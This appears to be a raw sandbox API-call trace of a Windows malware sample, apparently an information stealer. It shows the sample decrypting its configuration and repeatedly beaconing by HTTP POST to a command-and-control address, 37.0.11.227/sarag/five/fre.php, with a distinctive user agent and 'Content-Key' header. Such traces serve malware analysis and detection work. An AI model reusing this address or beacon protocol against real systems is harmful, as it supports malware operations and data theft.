LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.948] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0211.948] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.949] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0211.949] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.949] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0211.950] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.950] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0211.950] GetProcessHeap () returned 0x690000 [0211.950] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0211.951] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0211.951] GetProcessHeap () returned 0x690000 [0211.951] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0211.952] GetProcessHeap () returned 0x690000 [0211.952] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0211.952] GetProcessHeap () returned 0x690000 [0211.952] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0211.953] GetProcessHeap () returned 0x690000 [0211.953] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0211.953] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.953] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0211.958] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.958] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0211.964] GetProcessHeap () returned 0x690000 [0211.964] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0211.964] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.964] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0211.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.965] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0211.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.966] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0211.966] GetProcessHeap () returned 0x690000 [0211.966] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0211.967] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.967] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0211.968] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.968] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0211.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.969] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0211.969] GetProcessHeap () returned 0x690000 [0211.969] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0211.970] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.013] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0212.017] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.017] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0212.018] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.018] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0212.019] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.019] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0212.019] GetProcessHeap () returned 0x690000 [0212.019] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0212.019] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0212.019] GetProcessHeap () returned 0x690000 [0212.019] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0212.019] socket (af=2, type=1, protocol=6) returned 0x4ec [0212.019] connect (s=0x4ec, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0212.042] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0212.042] GetProcessHeap () returned 0x690000 [0212.042] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0212.042] GetProcessHeap () returned 0x690000 [0212.042] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0212.043] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0212.044] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0212.044] GetProcessHeap () returned 0x690000 [0212.044] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0212.044] GetProcessHeap () returned 0x690000 [0212.044] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0212.044] GetProcessHeap () returned 0x690000 [0212.044] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0212.044] GetProcessHeap () returned 0x690000 [0212.044] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0212.045] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0212.045] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0212.045] GetProcessHeap () returned 0x690000 [0212.045] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0212.046] GetProcessHeap () returned 0x690000 [0212.046] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0212.046] send (s=0x4ec, buf=0x6ad508*, len=242, flags=0) returned 242 [0212.046] send (s=0x4ec, buf=0x6aba40*, len=159, flags=0) returned 159 [0212.046] GetProcessHeap () returned 0x690000 [0212.046] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0212.046] recv (in: s=0x4ec, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0212.153] GetProcessHeap () returned 0x690000 [0212.153] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0212.153] GetProcessHeap () returned 0x690000 [0212.154] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0212.154] GetProcessHeap () returned 0x690000 [0212.155] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0212.155] GetProcessHeap () returned 0x690000 [0212.155] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0212.155] closesocket (s=0x4ec) returned 0 [0212.156] GetProcessHeap () returned 0x690000 [0212.156] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0212.156] GetProcessHeap () returned 0x690000 [0212.156] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0212.156] GetProcessHeap () returned 0x690000 [0212.156] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0212.157] GetProcessHeap () returned 0x690000 [0212.157] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0212.172] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x860) returned 0x4ec [0212.174] Sleep (dwMilliseconds=0xea60) [0212.179] GetProcessHeap () returned 0x690000 [0212.180] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0212.180] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.181] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0212.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.195] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0212.201] GetProcessHeap () returned 0x690000 [0212.202] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0212.202] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.203] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0212.203] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.204] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0212.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.205] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0212.205] GetProcessHeap () returned 0x690000 [0212.205] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0212.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.206] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0212.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.207] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0212.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.208] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0212.208] GetProcessHeap () returned 0x690000 [0212.208] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0212.208] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.209] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0212.209] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.210] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0212.211] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.211] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0212.212] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.212] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0212.212] GetProcessHeap () returned 0x690000 [0212.212] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0212.212] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0212.213] GetProcessHeap () returned 0x690000 [0212.213] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0212.213] GetProcessHeap () returned 0x690000 [0212.214] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0212.214] GetProcessHeap () returned 0x690000 [0212.214] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0212.214] GetProcessHeap () returned 0x690000 [0212.214] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0212.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.217] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0212.231] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.232] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0212.240] GetProcessHeap () returned 0x690000 [0212.240] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0212.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.241] CryptImportKey (in: hProv=0x6af188, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0212.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.243] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0212.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.244] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0212.244] GetProcessHeap () returned 0x690000 [0212.244] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0212.245] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.246] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0212.246] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.247] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0212.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.248] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0212.248] GetProcessHeap () returned 0x690000 [0212.248] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0212.249] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.249] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0212.251] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.251] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0212.252] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.253] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0212.254] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.254] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0212.254] GetProcessHeap () returned 0x690000 [0212.254] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0212.254] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0212.254] GetProcessHeap () returned 0x690000 [0212.254] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab400 [0212.254] socket (af=2, type=1, protocol=6) returned 0x4f0 [0212.255] connect (s=0x4f0, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0212.284] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0212.284] GetProcessHeap () returned 0x690000 [0212.284] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0212.284] GetProcessHeap () returned 0x690000 [0212.284] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0212.285] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0212.286] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0212.286] GetProcessHeap () returned 0x690000 [0212.286] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af800 [0212.286] GetProcessHeap () returned 0x690000 [0212.286] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0212.287] GetProcessHeap () returned 0x690000 [0212.287] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0212.287] GetProcessHeap () returned 0x690000 [0212.287] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0212.288] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0212.288] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0212.288] GetProcessHeap () returned 0x690000 [0212.288] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0212.289] GetProcessHeap () returned 0x690000 [0212.289] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0212.289] send (s=0x4f0, buf=0x6ad508*, len=242, flags=0) returned 242 [0212.290] send (s=0x4f0, buf=0x6aba40*, len=159, flags=0) returned 159 [0212.290] GetProcessHeap () returned 0x690000 [0212.290] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0212.290] recv (in: s=0x4f0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0212.398] GetProcessHeap () returned 0x690000 [0212.399] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0212.399] GetProcessHeap () returned 0x690000 [0212.400] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0212.400] GetProcessHeap () returned 0x690000 [0212.401] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af800 | out: hHeap=0x690000) returned 1 [0212.401] GetProcessHeap () returned 0x690000 [0212.410] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0212.416] closesocket (s=0x4f0) returned 0 [0212.416] GetProcessHeap () returned 0x690000 [0212.416] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab400 | out: hHeap=0x690000) returned 1 [0212.417] GetProcessHeap () returned 0x690000 [0212.417] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0212.417] GetProcessHeap () returned 0x690000 [0212.418] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0212.418] GetProcessHeap () returned 0x690000 [0212.419] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0212.419] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x3b8) returned 0x4f0 [0212.426] Sleep (dwMilliseconds=0xea60) [0212.429] GetProcessHeap () returned 0x690000 [0212.429] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0212.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.432] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0212.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.471] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0212.482] GetProcessHeap () returned 0x690000 [0212.482] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0212.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.483] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0212.517] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.518] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0212.519] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.524] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0212.533] GetProcessHeap () returned 0x690000 [0212.533] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0212.535] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.535] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0212.547] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.548] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0212.550] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0212.550] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0212.551] GetProcessHeap () returned 0x690000 [0212.551] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0212.552] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.553] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0212.555] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.555] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0212.556] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.557] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0212.558] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.558] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0212.558] GetProcessHeap () returned 0x690000 [0212.558] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0212.562] 